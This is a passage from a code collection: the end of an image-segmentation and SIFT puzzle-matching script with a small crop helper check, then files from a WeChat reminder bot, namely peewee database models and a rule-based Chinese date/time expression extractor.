                decision_array[train_idxes[bin_mask_idx] - 1] += 1
                break

    sorted_decision_array = sorted(decision_array)
    if sorted_decision_array[-1] != sorted_decision_array[-2]:
        return np.argmax(decision_array) + 1
    else:
        # ambiguous answer, try one more time recursively
        return compare_images(idxed_image, train_image, ratio_thresh)


image = io.imread(image_dir)

# image preprocessing
im = Image.fromarray(image)
enhancer = ImageEnhance.Sharpness(im)
enhanced_im = enhancer.enhance(5)
image = np.array(enhanced_im)
image = np.ascontiguousarray(image, dtype=np.uint8)

# several iterations to make algorithm answers more robust
num_iter = 1
for comp_idx in np.unique(markers):
    if comp_idx != -1 and comp_idx != 1:
        mask = (markers == comp_idx).astype(np.uint8)
        bin_mask = (mask != 0).astype(np.uint8)
        idxed_image = cv2.bitwise_and(image, image, mask=mask)
        idxed_image = crop_image(idxed_image, bin_mask)
        iter_ans_arr = []
        for _ in range(num_iter):
            iter_res = compare_images(idxed_image, train_image, 0.7)
            iter_ans_arr.append(iter_res)
        curr_ans = np.bincount(iter_ans_arr).argmax()
        text_x, text_y, text_w, text_h = cv2.boundingRect(bin_mask)
        image = cv2.putText(image, train_answers[curr_ans - 1],
                            (text_x + text_w // 2 - 75, text_y + text_h // 2),
                            cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), thickness=10)
        image = cv2.rectangle(image, (text_x, text_y), (text_x + text_w, text_y + text_h),
                              (255, 255, 255), thickness=8)

plt.figure(figsize=(20, 20))
plt.imshow(image, cmap='gray')
```
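The `crop_image` helper above is what tightens each watershed component to its bounding box before SIFT matching. The check below restates that helper verbatim and runs it on a synthetic canvas, so no puzzle photo is needed; the white square simply stands in for a segmented piece.

```python
# Minimal check of the crop_image helper on a synthetic image: a 100x100 black
# canvas with a white square; the crop should tighten to the square's bounding box.
import numpy as np
import cv2


def crop_image(img, mask=None):
    if mask is None:
        gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        mask = (gray_img != 0).astype(np.uint8)
    x, y, w, h = cv2.boundingRect(mask)
    return (img[y : y + h + 1, x : x + w + 1, :]).astype(np.uint8)


canvas = np.zeros((100, 100, 3), dtype=np.uint8)
canvas[20:60, 30:80] = 255                 # synthetic "puzzle piece"
cropped = crop_image(canvas)
print(canvas.shape, "->", cropped.shape)   # (100, 100, 3) -> (41, 51, 3)
```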
{ "source": "aaashuai/easy_wechat_reminder", "score": 3 }
#### File: aaashuai/easy_wechat_reminder/models.py ```python import time from peewee import SqliteDatabase, Model, CharField, IntegerField, TextField from typevar import JobState db = SqliteDatabase("wxbotv2.db") class TableScheduleJob(Model): id = IntegerField(index=True, primary_key=True, help_text="真实ID") job_id = IntegerField(index=True, help_text="任务ID") room = TextField(index=True, help_text="群聊房间") name = CharField(index=True, help_text="任务名称") start_time = IntegerField(default=lambda: int(time.time()), help_text="开始时间") next_run_time = IntegerField(help_text="下一次执行时间") schedule_info = CharField(null=True, help_text="周期类型或天数") state = IntegerField(default=JobState.ready, choices=JobState, help_text="任务执行状态") remind_msg = TextField(help_text="定时提醒内容") class Meta: database = db class TableScheduleRecord(Model): id = IntegerField(index=True, primary_key=True) job_real_id = IntegerField(index=True, help_text="任务真实ID") remind_msg = TextField(help_text="本次提醒内容") create_time = IntegerField(default=lambda: int(time.time()), help_text="执行时间") class Meta: database = db def create_tables(): with db: db.create_tables([TableScheduleJob, TableScheduleRecord]) create_tables() ``` #### File: ner/dtime/dtime.py ```python import regex as re from datetime import datetime, time from typing import Optional, Dict, Union, Tuple, List, Callable from typing import Any, Text from dateutil.relativedelta import relativedelta from ner import BaseExtractor from ner.models import Datetime from ner.number import number_ext from ner.dtime.date_pattern import YEAR_OPTIONAL_DATE, YEAR __all__ = ("DateObject", "Duration", "ZHDatetimeExtractor", "date_extractor") # Duration除外的日期表达 class DateObject: def __init__( self, now, entity, parse_code, datetime_level, is_discrete, is_range, datetime_type, base_time=None, period=(0, 0, 0, 0), duration=(0, 0, 0, 0), is_week=None, is_specific_time=None, **data, ): """ :param now: :param entity: 提取出的实体,比如"周三" :param parse_code: :param datetime_level: [0,0,0,0,0,0]六位占位符列表,分别对应[年,月,日,时,分,秒],0为该位无值,1为有值 :param is_discrete: [x,x]两位列表,x取值为None,0,1; 其中第一位代表Date,第二位代表Time,非None代表为对应类型,比如[1, 1]代表Datetime类型,且Date和Time处is_discrete都为True :param is_range: 与is_discrete类似 :param datetime_type: :param base_time: :param period: [year, month, day, second] :param duration: [year, month, day, second] :param is_week: :param is_specific_time: :param data: """ self.now = now self.entity = entity self.parse_code = parse_code self.datetime_level = datetime_level self.is_discrete = is_discrete self.is_range = is_range self.datetime_type = datetime_type self.base_time = base_time self.period = list(period) self.duration = list(duration) self.is_week = is_week self.is_specific_time = is_specific_time self.value = None self.nearest = None self.data = data self.parse_dict = { 0: self.parse_input_0, 2: self.parse_input_1, 4: self.adjust_base_to_previous, 5: self.adjust_base_to_previous, 6: self.parse_input_2, 8: self.parse_input_2, 10: self.parse_input_3, 11: self.parse_input_3, 12: self.parse_input_3, 13: self.parse_input_3, 14: self.parse_input_3, 15: self.parse_input_3, 16: self.parse_input_3, 17: self.parse_input_3, 18: self.parse_input_3, 19: self.parse_input_3, 20: self.parse_input_3, 21: self.parse_input_3, 22: self.parse_input_3, 23: self.parse_input_3, 24: self.parse_input_4, 25: self.parse_input_4, 26: self.parse_input_4, 27: self.parse_input_4, 28: self.parse_input_4, 29: self.parse_input_4, 31: self.parse_input_5, 32: self.parse_input_5, 33: self.parse_input_5, 34: self.parse_input_4, 35: 
self.parse_input_4, 36: self.parse_input_4, 45: self.parse_input_2, } self.relative_date_dict = { "本": 0, "这": 0, "今": 0, "来": 1, "去": -1, "昨": -1, "明": 1, "上": -1, "下": 1, "这1": 0, "上1": -1, "下1": 1, "这个": 0, "上个": -1, "下个": 1, "前个": -1, "后个": 1, "这1个": 0, "上1个": -1, "下1个": 1, "前": -2, "后": 2, "大前": -3, "大后": 3, } self.holiday_dict = { "元旦": (datetime(2018, 1, 1), datetime(2019, 1, 1), datetime(2020, 1, 1)), "除夕": (datetime(2018, 2, 15), datetime(2019, 2, 4), datetime(2020, 1, 24)), "年30": (datetime(2018, 2, 15), datetime(2019, 2, 4), datetime(2020, 1, 24)), "春节": (datetime(2018, 2, 16), datetime(2019, 2, 5), datetime(2020, 1, 25)), "清明": (datetime(2018, 4, 5), datetime(2019, 4, 5), datetime(2020, 4, 5)), "劳动": (datetime(2018, 5, 1), datetime(2019, 5, 1), datetime(2020, 5, 1)), "端午": (datetime(2018, 6, 18), datetime(2019, 6, 7), datetime(2020, 6, 25)), "中秋": (datetime(2018, 9, 24), datetime(2019, 9, 13), datetime(2020, 10, 1)), "国庆": (datetime(2018, 10, 1), datetime(2019, 10, 1), datetime(2020, 10, 1)), "圣诞": ( datetime(2018, 12, 25), datetime(2019, 12, 25), datetime(2020, 12, 25), ), } self.timerange_dict = { "清晨": (4, 4), "黎明": (4, 4), "早上": (6, 6), "早晨": (6, 6), "上午": (6, 6), "晌午": (8, 4), "中午": (11, 2), "午间": (11, 2), "午后": (12, 4), "下午": (12, 4), "黄昏": (16, 4), "傍晚": (16, 4), "晚上": (18, 8), "夜晚": (18, 4), "晚间": (18, 4), "深夜": (20, 4), "凌晨": (0, 6), } self.time_dict = {"正午": 12, "半夜": 0, "午夜": 0} self.datetimerange_dict = { "今早": (6, 6, 0), "今晚": (18, 4, 0), "今夜": (18, 4, 0), "昨晚": (18, 4, -1), "昨夜": (18, 4, -1), "明早": (6, 6, 1), "明晚": (18, 4, 1), } def __repr__(self): return "{}({}, {}, {}, {}, {}, {})".format( self.datetime_type, self.datetime_level, self.is_discrete, self.is_range, self.entity, self.value, self.nearest, ) def __add__(self, other): assert type(other) == DateObject # 如果两个相加对象同为Daterange, Timerange, Datetimerange,则返回None for i in range(2): if self.is_range[i] == 1 and other.is_range[i] == 1: return None fst_lowest, snd_highest = 5, 0 for i in range(5, -1, -1): if self.datetime_level[i]: fst_lowest = i break for i in range(6): if other.datetime_level[i]: snd_highest = i break # timelevel正好相差1位 if ( (snd_highest - fst_lowest == 1) or ( (self.is_week == 1) and (other.parse_code == 27) and (other.is_week == 2) ) or (self.is_specific_time and (snd_highest == 3)) ): if self.is_week is None: if other.is_week: return False else: if self.is_week == 1: if other.is_week is None: return False # TODO 2021年节假日还需修改这里 if other.parse_code == 30: if ( (self.base_time.year != 2018) and (self.base_time.year != 2019) and (self.base_time.year != 2020) ) or (not (self.is_range[0])): return False if self.is_specific_time and not (snd_highest == 3): return False sum_entity = self.entity + other.entity sum_datetime_level = [ a ^ b for (a, b) in zip(self.datetime_level, other.datetime_level) ] if other.parse_code == 27: sum_datetime_level = [0] * 6 if self.is_specific_time: sum_datetime_level[3] = 1 sum_is_discrete = self.add_discrete_range_helper( zip(self.is_discrete, other.is_discrete) ) sum_is_range = self.add_discrete_range_helper( zip(self.is_range, other.is_range) ) sum_period = [0, 0, 0, 0] if sum_is_discrete[0]: sum_period[0:3] = self.period[0:3] if sum_is_discrete[1]: if self.is_discrete[1]: sum_period[3] = self.period[3] else: sum_period[3] = other.period[3] sum_duration = [0, 0, 0, 0] if sum_is_range[0]: sum_duration[0:3] = other.duration[0:3] if sum_is_range[1]: if self.is_range[1]: sum_duration[3] = other.duration[3] else: sum_duration[3] = other.duration[3] sum_datetime_type = 
self.calculate_datetime_type(sum_is_range) if other.parse_code == 30: sum_base_time = self.holiday_dict[other.entity][ self.base_time.year - 2018 ] else: sum_base_time = self.add_base_time_helper(self.base_time, other) if not sum_base_time: return "Illegal" sum_date_object = DateObject( self.now, sum_entity, -1, sum_datetime_level, sum_is_discrete, sum_is_range, sum_datetime_type, sum_base_time, sum_period, sum_duration, ) if other.is_specific_time: sum_date_object.is_specific_time = 1 if self.parse_code == 30: temp1 = DateObject( self.now, sum_entity, -1, sum_datetime_level, sum_is_discrete, sum_is_range, sum_datetime_type, self.add_base_time_helper(self.value[0], other), sum_period, sum_duration, ) temp2 = DateObject( self.now, sum_entity, -1, sum_datetime_level, sum_is_discrete, sum_is_range, sum_datetime_type, self.add_base_time_helper( self.value[int(len(self.value) / 2)], other ), sum_period, sum_duration, ) temp1.parse_input() temp2.parse_input() sum_date_object.parse_code = 30 if type(temp1.value) == list: sum_date_object.value = temp1.value + temp2.value else: sum_date_object.value = [temp1.value, temp2.value] sum_date_object.calculate_nearest() else: sum_date_object.parse_input() return sum_date_object else: return False @staticmethod def add_discrete_range_helper(zip_list): rtn = [] for (a, b) in zip_list: if (a is None) and (b is None): rtn.append(None) elif a is None: rtn.append(b) elif b is None: rtn.append(a) else: rtn.append(a & b) return rtn def add_base_time_helper(self, base_time, other): sum_base_time = base_time if type(sum_base_time) == dict: sum_base_time = sum_base_time["start"] if other.is_week == 2: if (other.base_time >= base_time) and ( other.base_time < (base_time + relativedelta(weeks=1)) ): sum_base_time = other.base_time elif (other.base_time - relativedelta(weeks=1) >= base_time) and ( other.base_time - relativedelta(weeks=1) < (base_time + relativedelta(weeks=1)) ): sum_base_time = other.base_time - relativedelta(weeks=1) elif (other.base_time + relativedelta(weeks=1) >= base_time) and ( other.base_time + relativedelta(weeks=1) < (base_time + relativedelta(weeks=1)) ): sum_base_time = other.base_time + relativedelta(weeks=1) else: sum_base_time = other.base_time + relativedelta(weeks=2) elif self.is_specific_time: found = False if self.is_range[1]: if "上午" in self.entity: check_start = time(0, 0, 1) check_end = time(12) elif "下午" in self.entity: check_start = time(12, 0, 1) check_end = time(0) else: if type(self.value) == list: check_range = self.value[0] else: check_range = self.value check_start = check_range["start"].time() check_end = check_range["end"].time() if other.is_discrete[1]: for value in other.value: if "晚上" in self.entity: if (value.time() >= check_start) and ( value.time() <= time(23, 59, 59) ): sum_base_time = sum_base_time.replace( hour=value.hour, minute=value.minute ) found = True break elif (value.time() >= time(0)) and ( value.time() <= check_end ): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=value.hour, minute=value.minute, ) found = True break else: if (value.time() == time(0)) and (check_end == time(0)): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=value.hour, minute=value.minute, ) found = True break elif (value.time() >= check_start) and ( (value.time() <= check_end) or (check_end == time(0)) ): sum_base_time = sum_base_time.replace( hour=value.hour, minute=value.minute ) found = True break else: if "晚上" in self.entity: if (other.value.time() >= check_start) and ( 
other.value.time() <= time(23, 59, 59) ): sum_base_time = sum_base_time.replace( hour=other.value.hour, minute=other.value.minute ) found = True elif (other.value.time() >= time(0)) and ( other.value.time() <= check_end ): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=other.value.hour, minute=other.value.minute, ) found = True else: if (other.value.time() == time(0)) and (check_end == time(0)): sum_base_time = sum_base_time.replace( day=sum_base_time.day + 1, hour=other.value.hour, minute=other.value.minute, ) found = True elif (other.value.time() >= check_start) and ( (other.value.time() <= check_end) or (check_end == time(0)) ): sum_base_time = sum_base_time.replace( hour=other.value.hour, minute=other.value.minute ) found = True if not found: return False else: if type(self.value) == list: check_time = self.value[0].time() else: check_time = self.value.time() for value in other.value: if value.time() == check_time: found = True break if not found: return False else: if other.datetime_level[1]: sum_base_time = sum_base_time.replace(month=other.base_time.month) if other.datetime_level[2]: sum_base_time = sum_base_time.replace(day=other.base_time.day) if other.datetime_level[3]: sum_base_time = sum_base_time.replace(hour=other.base_time.hour) if other.datetime_level[4]: sum_base_time = sum_base_time.replace(minute=other.base_time.minute) if other.datetime_level[5]: sum_base_time = sum_base_time.replace(second=other.base_time.second) return sum_base_time @staticmethod def calculate_datetime_type(is_range): if is_range[1] is None: if is_range[0]: return "DateRange" else: return "Date" else: if is_range[0] is None: if is_range[1]: return "TimeRange" else: return "Time" else: if is_range[1]: return "DatetimeRange" else: return "Datetime" # 调整离散日期的base_time为现在的上一个日期 def adjust_base_to_previous(self): if self.base_time > self.now: self.base_time -= relativedelta( years=self.period[0], months=self.period[1], days=self.period[2], seconds=self.period[3], ) # 类似"(年.)月.日"的处理 def parse_input_0(self): if self.data["year"]: self.base_time = datetime( int(self.data["year"]), int(self.data["month"]), int(self.data["day"]) ) else: self.datetime_level[0] = 0 self.is_discrete[0] = 1 self.period[0] = 1 self.base_time = datetime( self.now.year, int(self.data["month"]), int(self.data["day"]) ) self.adjust_base_to_previous() # 对于中文(一个一个数字)所说年份的处理 def parse_input_1(self): if self.data["year"][0]: self.data["year"] = self.data["year"][0].replace(" ", "") else: self.data["year"] = self.data["year"][1].replace(" ", "") if len(self.data["year"]) == 2: if self.data["year"] >= "50": self.data["year"] = "19" + self.data["year"] else: self.data["year"] = "20" + self.data["year"] self.base_time = datetime(int(self.data["year"]), 1, 1) # 表示特定时刻的处理 def parse_input_2(self): second = 0 if "second" in self.data: if self.data["second"]: second = int(self.data["second"]) if not self.data["minute"]: self.data["minute"] = 0 if not (type(self.data["hour"]) == int): if self.data["hour"][0]: self.data["hour"] = int(self.data["hour"][0]) if self.data["minute"]: minute_dict = {"钟": 0, "整": 0, "1刻": 15, "半": 30, "3刻": 45} self.data["minute"] = minute_dict[self.data["minute"]] else: self.data["hour"] = int(self.data["hour"][1]) if (self.data["hour"] <= 12) and (self.data["hour"] != 0): self.is_discrete[1] = 1 self.period[3] = 3600 * 12 if self.data["hour"] == 12 or self.data["hour"] == 24: self.data["hour"] = 0 self.base_time = self.now.replace( hour=self.data["hour"], minute=self.data["minute"], second=second, 
microsecond=0, ) # 表示X时刻前/后以及前/后X时刻的处理 def parse_input_3(self): half_delta_dict = { "years": relativedelta(months=6), "months": relativedelta(days=15), "days": relativedelta(hours=12), "hours": relativedelta(minutes=30), "minutes": relativedelta(seconds=30), } if self.data["level"] == "years": if self.data["years"]: delta = relativedelta(years=int(self.data["years"])) if "半" in self.entity: delta += half_delta_dict["years"] else: delta = half_delta_dict["years"] elif self.data["level"] == "months": if self.data["months"]: delta = relativedelta(months=int(self.data["months"])) if "半" in self.entity: delta += half_delta_dict["months"] else: delta = half_delta_dict["months"] elif self.data["level"] == "weeks": delta = relativedelta(weeks=int(self.data["weeks"])) elif self.data["level"] == "days": if self.data["days"]: delta = relativedelta(days=int(self.data["days"])) if "半" in self.entity: delta += half_delta_dict["days"] else: delta = half_delta_dict["days"] elif self.data["level"] == "hours": if self.data["hours"]: delta = relativedelta(hours=int(self.data["hours"])) if "半" in self.entity: delta += half_delta_dict["hours"] else: delta = half_delta_dict["hours"] elif self.data["level"] == "minutes": if self.data["minutes"]: delta = relativedelta(minutes=int(self.data["minutes"])) if "半" in self.entity: delta += half_delta_dict["minutes"] else: if "1刻钟" in self.entity: delta = relativedelta(minutes=15) elif "3刻钟" in self.entity: delta = relativedelta(minutes=45) else: delta = half_delta_dict["minutes"] else: delta = relativedelta(seconds=int(self.data["seconds"])) if (self.entity[-1] == "前") or (self.entity[0] == "前"): self.base_time = (self.now - delta).replace(microsecond=0) elif self.entity[-1] == "后": self.base_time = (self.now + delta).replace(microsecond=0) else: self.base_time = self.now.replace(microsecond=0) if any(self.is_range): self.duration = [ delta.years, delta.months, delta.days, delta.hours * 3600 + delta.minutes * 60 + delta.seconds, ] # 获取本周X日期 def get_weekday_date(self, weekday): weekday -= 1 result_date = self.now while result_date.weekday() != weekday: if result_date.weekday() > weekday: result_date += relativedelta(days=-1) else: result_date += relativedelta(days=1) return datetime(result_date.year, result_date.month, result_date.day) def discrete_week_helper(self): self.datetime_level[0], self.datetime_level[1] = 0, 0 if self.base_time > self.now: self.base_time += relativedelta(weeks=-1) self.is_discrete[0] = 1 self.period[2] = 7 self.is_week = 2 # 表示相对时刻的处理 def parse_input_4(self): # 相对年表达 if self.parse_code == 24: if self.data["relative"][0]: relative_delta = relativedelta( years=self.relative_date_dict[self.data["relative"][0]] ) else: relative_delta = relativedelta( years=self.relative_date_dict[self.data["relative"][1]] ) self.base_time += relative_delta # 相对月表达 elif self.parse_code == 25: self.base_time += relativedelta( months=self.relative_date_dict[self.data["relative"]] ) # 相对周表达 elif self.parse_code == 26: self.base_time = self.get_weekday_date(1) if self.data["relative"][0]: relative_delta = relativedelta( weeks=self.relative_date_dict[self.data["relative"][0]] ) else: relative_delta = relativedelta( weeks=self.relative_date_dict[self.data["relative"][1]] ) self.base_time += relative_delta # 相对周末表达 elif self.parse_code == 27: self.base_time = self.get_weekday_date(6) if self.data["relative"]: self.base_time += relativedelta( weeks=self.relative_date_dict[self.data["relative"]] ) else: self.discrete_week_helper() # 相对周X(具体日期)表达 elif self.parse_code == 28: 
if (self.data["weekday"] == "天") or (self.data["weekday"] == "日"): self.data["weekday"] = "7" self.base_time = self.get_weekday_date(int(self.data["weekday"])) if self.data["relative"][1]: self.base_time += relativedelta( weeks=self.relative_date_dict[self.data["relative"][1]] ) elif not (self.data["relative"][0]): self.discrete_week_helper() # 相对日表达 elif self.parse_code == 29: self.base_time += relativedelta( days=self.relative_date_dict[self.entity[0:-1]] ) # 相对小时表达 elif self.parse_code == 34: self.base_time += relativedelta( hours=self.relative_date_dict[self.entity[0:-2]] ) # 相对小时表达 elif self.parse_code == 35: self.base_time += relativedelta( minutes=self.relative_date_dict[self.data["relative"]] ) # 相对小时表达 elif self.parse_code == 36: self.base_time += relativedelta( seconds=self.relative_date_dict[self.data["relative"]] ) # 表示一天中特定时间段/点的表达的处理 def parse_input_5(self): if self.parse_code == 32: hour = self.time_dict[self.entity] elif self.parse_code == 31: hour = self.timerange_dict[self.entity][0] self.duration[3] = 3600 * self.timerange_dict[self.entity][1] else: hour = self.datetimerange_dict[self.entity][0] self.duration[3] = 3600 * self.datetimerange_dict[self.entity][1] self.base_time = self.now.replace(hour=hour, minute=0, second=0, microsecond=0) if self.parse_code == 33: self.base_time += relativedelta( days=self.datetimerange_dict[self.entity][2] ) # 解析日期表述,按需要更新base_time, period, 以及duration字段, 计算出具体输出值以及最接近目前时间的值。 def parse_input(self): if self.parse_code == 30: # 假期 self.base_time = self.holiday_dict[self.entity][1] if self.base_time > self.now: self.value = [ self.holiday_dict[self.entity][0], self.holiday_dict[self.entity][1], ] else: self.value = [ self.holiday_dict[self.entity][1], self.holiday_dict[self.entity][2], ] else: if self.parse_code in self.parse_dict: self.parse_dict[self.parse_code]() self.calculate_value() self.calculate_nearest() def calculate_value(self): date_period = relativedelta( years=self.period[0], months=self.period[1], days=self.period[2] ) time_period = relativedelta(seconds=self.period[3]) duration = relativedelta( years=self.duration[0], months=self.duration[1], days=self.duration[2], seconds=self.duration[3], ) if any(self.period): if any(self.duration): self.value = [ {"start": self.base_time, "end": self.base_time + duration}, { "start": self.base_time + date_period, "end": self.base_time + date_period + duration, }, ] else: if any(self.period[0:3]) and self.period[3]: self.value = [ self.base_time, self.base_time + time_period, self.base_time + date_period, self.base_time + date_period + time_period, ] elif self.period[3]: self.value = [self.base_time, self.base_time + time_period] else: self.value = [self.base_time, self.base_time + date_period] else: if any(self.duration): self.value = {"start": self.base_time, "end": self.base_time + duration} else: self.value = self.base_time def calculate_nearest(self): if type(self.value) == list: if type(self.value[0]) == dict: min_delta = abs(self.now - self.value[0]["start"]) else: min_delta = abs(self.now - self.value[0]) self.nearest = self.value[0] for i in range(1, len(self.value)): if type(self.value[i]) == dict: temp = abs(self.now - self.value[i]["start"]) else: temp = abs(self.now - self.value[i]) if temp <= min_delta: min_delta, self.nearest = temp, self.value[i] else: self.nearest = self.value class Duration: def __init__(self, entity, parse_code, length): self.entity = entity self.parse_code = parse_code self.type = "Duration" self.length = length self.value = None self.duration_dict = { 
38: 31536000, 39: 2592000, 40: 604800, 41: 86400, 42: 3600, 43: 60, 44: 1, } def __repr__(self): return "{}({}, {}s)".format(self.type, self.entity, self.value) # 对于带"半"的时间长度的处理 def half_duration_helper(self, duration_unit): if "年" in self.entity: return self.duration_dict[39] * 6 else: return int(0.5 * duration_unit) def parse_input(self): duration_unit = self.duration_dict[self.parse_code] half_offset = 0 if self.length: value = int(self.length) if "半" in self.entity: half_offset = self.half_duration_helper(duration_unit) self.value = value * duration_unit + half_offset elif "1刻钟" == self.entity: self.value = 15 * 60 elif "3刻钟" == self.entity: self.value = 45 * 60 else: self.value = self.half_duration_helper(duration_unit) def remove_inclusion(r): r = sorted(r, key=lambda x: (x[1], x[2])) if len(r) > 1: fst = 0 snd = 1 while snd < len(r): # 重复匹配到的字串a,b,起点相同,比较终点,终点小的被舍弃 if (r[fst][1] == r[snd][1]) and (r[fst][2] <= r[snd][2]): r.remove(r[fst]) # 起止index有交叉的字串,取起始更小的字串,remove起始较大的字串 elif (r[fst][1] < r[snd][1]) and (r[fst][2] > r[snd][1]): r.remove(r[snd]) else: fst += 1 snd += 1 return r def get_type( is_date_range: Optional[int], is_time_range: Optional[int] ) -> Tuple[Optional[str], bool]: if is_date_range == 0 and is_time_range is None: rtn, is_range = "date", False elif is_date_range == 1 and is_time_range is None: rtn, is_range = "date", True elif is_date_range is None and is_time_range == 0: rtn, is_range = "time", False elif is_date_range is None and is_time_range == 1: rtn, is_range = "time", True elif is_date_range == 0 and is_time_range == 0: rtn, is_range = "datetime", False elif is_date_range is not None and is_time_range == 1: rtn, is_range = "datetime", True else: rtn, is_range = None, False return rtn, is_range def get_datetime_value(data: Union[Dict, datetime]) -> Tuple[datetime, Optional[int]]: if isinstance(data, dict): value = data["start"] delta = int((data["end"] - value).total_seconds()) else: value = data delta = None return value, delta class ZHDatetimeExtractor(BaseExtractor): def __init__(self, now_func: Callable = None): if now_func is None: now_func = datetime.now self.patterns = { # 类似"(年.)月.日"的识别 re.compile(YEAR_OPTIONAL_DATE): 0, # 类似"年.月"的识别 re.compile(r"(?<!\d)((?:19|20)\d{2})[-./](1[012]|0?[1-9])(?!\d)"): 1, # 对于中文(一个一个数字)所说年份的识别,主要针对数字识别模块识别类似二零二零年为2 0 2 0年的问题 re.compile(r"((?:1\s9|2\s0)(?:\s\d){2})年?|(\d\s\d)年"): 2, # 四位阿拉伯数字表示"XXXX年"的识别 re.compile(f"{YEAR}(?:年)"): 3, # 表示"XX月"的识别 re.compile(r"(1[012]|[1-9])月"): 4, # 表示"XX日"的识别 # re.compile(r"(?<!月)(3[01]|[1-2]\d|(?<!\d)[1-9])[日号]"): 5, re.compile(r"(3[01]|[1-2]\d|(?<!\d)[1-9])[日号]"): 5, # 表示特定时刻的识别 re.compile(r"(2[0-4]|1\d|\d)点(钟|1刻|3刻|半|整)?|(2[0-4]|1\d|\d)时"): 6, # 表示特定分钟的识别 re.compile(r"([1-5]\d|0?\s?\d)分"): 7, # 表示X点X(分)的识别 re.compile(r"(2[0-4]|1\d|\d)[点时]([1-5]\d|0?\s?\d)分?"): 8, # 表示特定秒钟的识别 re.compile(r"(0\s?\d|[1-5]\d)秒"): 9, # 表示"X年前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)年半?|半年)[前后]"): 10, # 表示"X个月前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)个半?月|半个月)[前后]"): 11, # 表示"X周前/后"(时间点)的识别 re.compile(r"([1-9]\d*)(?:个?星期|个?礼拜|周)[前后]"): 12, # 表示"X天前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)[天日]半?|半[天日])[前后]"): 13, # 表示"X小时前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)(?:小时|个半?小时|个半?钟头)|半个?小时|半个钟头)[前后]"): 14, # 表示"X分钟前/后"(时间点)的识别 re.compile(r"(?:([1-9]\d*)(?:分半钟?|分钟)|半分钟|[13]刻钟)[前后]"): 15, # 表示"X秒前/后"(时间点)的识别 re.compile(r"([1-9]\d*)秒钟?[前后]"): 16, # 表示"前/后X年"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)年半?|半年)"): 17, # 表示"前/后X个月"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)个半?月|半个月)"): 18, # 表示"前/后X周"(时间段)的识别 
re.compile(r"[前后]([1-9]\d*)(?:个?星期|个?礼拜|周)"): 19, # 表示"前/后X天"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)[天日]半?|半[天日])"): 20, # 表示"前/后X小时"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)(?:小时|个半?小时|个半?钟头)|半个?小时|半个钟头)"): 21, # 表示"前/后X分钟"(时间段)的识别 re.compile(r"[前后](?:([1-9]\d*)(?:分半钟?|分钟)|半分钟|[13]刻钟)"): 22, # 表示"前/后X秒"(时间段)的识别 re.compile(r"[前后]([1-9]\d*)秒钟?"): 23, # 表示年级日期的相对表达的识别 re.compile( r"(本|上1|下1|今|去|明|前|后|来|大前|大后)年|(本|这1|这1?个|上1|下1|上1?个|下1?个)年度" ): 24, # 表示月级日期的相对表达的识别 re.compile(r"(本|上|下|这1?个|上1?个|下1?个)月"): 25, # 表示周级日期的相对表达的识别 re.compile( r"(本|这1?|上1?|下1?|这1?个|上1?个|下1?个)(?:星期|周)|(这1?|上1?|下1?|这1?个|上1?个|下1?个|前个|后个)礼拜" ): 26, # 表示周末时间段的相对表达的识别 re.compile(r"(本|这1?|上1?|下1?|这1?个|上1?个|下1?个)?周末"): 27, # 表示星期X的相对表达的识别 re.compile(r"(?:(本周)|(这个?|上个?|下个?)?(?:星期|礼拜|周))([123456天日])"): 28, # 表示天级日期的相对表达的识别 re.compile(r"(?:今|昨|明|前|后|大前|大后)天|[本今昨明]日"): 29, # 表示一年中特定日期段的表达的识别 re.compile(r"元旦|除夕|年30|春节|端午|国庆|中秋|劳动|圣诞|清明"): 30, # 表示一天中特定时间段的表达的识别 re.compile(r"清晨|黎明|早上|早晨|上午|晌午|中午|午间|午后|下午|黄昏|晚上|夜晚|晚间|傍晚|深夜|凌晨"): 31, # 表示一天中特定时间点的表达的识别 re.compile(r"正午|半夜|午夜"): 32, # 天级日期和特定时间段在一起时的缩写表达的识别 re.compile(r"今早|今晚|今夜|昨晚|昨夜|明早|明晚"): 33, # 表示小时级时间的相对表达的识别 re.compile(r"(?:这1|上1|下1|这1?个|上1?个|下1?个)小时|(?:这1?个|上1?个|下1?个)钟头"): 34, # 表示分钟级时间的相对表达的识别 re.compile(r"(这1|上1|下1)分钟"): 35, # 表示秒钟级时间的相对表达的识别 re.compile(r"(这1|上1|下1)秒钟?"): 36, # 表示"现在"的表达的识别 re.compile(r"现在|当下|刚刚|此时此刻|此时|此刻|目前|当前|今时"): 37, # 表示"X年"(时间长度)的处理 re.compile(r"([1-9]\d{0,2}|[1-9]\d{4,}|1[0-8]\d{2}|2[1-9]\d{2})年半?|半年"): 38, # 表示"X个月"(时间长度)的处理 re.compile(r"([1-9]\d*)个半?月|半个月"): 39, # 表示"X周"(时间长度)的处理 re.compile(r"([1-9]\d*)(?:个?星期|个?礼拜|周)"): 40, # 表示"X天"(时间长度)的处理 re.compile(r"([1-9]\d*)[天日]半?|半[天日]"): 41, # 表达"X小时"(时间长度)的表达 re.compile(r"(?:([1-9]\d*)(?:小时|个半?小时|个半?钟头)|半个?小时|半个钟头)"): 42, # 表达"X分钟"(时间长度)的表达 re.compile(r"([1-9]\d*)分[钟半]|[13]刻钟|半分钟"): 43, # 表达"X秒钟"(时间长度)的表达 re.compile(r"([1-9]\d*)秒钟?"): 44, # 形如XX:XX:XX的表达(表示时间)的识别 re.compile(r"(2[0-4]|1\d|\d)[::](0\d|[1-5]\d)(?:[::](0\d|[1-5]\d))?"): 45, # 表达"xx月xx" re.compile(r"([2-9]|1[0-2]?)月(3[01]|[1-2]\d|[1-9])[日]?"): 46, } self.now_func = now_func def parse(self, text: Text, *args: Any) -> List[Datetime]: # s_arabic_without_dot: 中文数字转换为阿拉伯数字 (不替换"点") ( s_arabic_without_dot, replacement_relationship_without_dot, space_index, ) = number_ext.parse_datetime_num(text) # 当前时间 now = self.now_func() # 识别结果 r = [] durations = [] # 去掉空格 # s_arabic_without_dot = s_arabic_without_dot.replace(" 